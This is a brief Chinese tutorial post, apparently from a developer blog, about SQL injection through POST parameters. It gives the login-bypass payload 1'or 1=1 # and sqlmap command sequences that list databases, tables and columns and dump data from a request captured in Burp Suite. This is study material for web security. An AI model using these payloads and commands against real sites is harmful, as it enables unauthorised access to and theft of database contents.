sql注入之post 传参方式的注入

本文介绍了SQL注入攻击中的两种常见方法,包括使用SQLmap工具进行POST注入,以及在实际环境中通过BurpSuite捕获和利用POST请求进行注入。详细步骤涉及参数位置操作、创建文本文件和使用命令行参数执行SQLmap脚本。
摘要由CSDN通过智能技术生成

在输入框里面进行注入

需要的注释符 #

是否存在注入点,注入点在有和数据库服务器交互的地方

万能密码

1'or 1=1 #

sqlmap 之post 注入1:

将变量参数位置加*

uname =name*
在sqlmap安装 目录下面新建文本文件为x.txt

python sqlmap.py   -r  r.txt

                 --dbs 

-D dn   --tables 

-D dn -T  tn --columns

-D dn -T tn -c1,c2  --dump

 

post 注入2:

先将post请求在burp捕获,将抓到的请求内容保存到文件中,
sqlmap  -r ./sqlmapfile(-r  捕获的请求文件及其所在位置) -p  id(加入指定参数)  --cookie="" 
加入-p 指定参数  -p id

 

 

 

  • 10
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值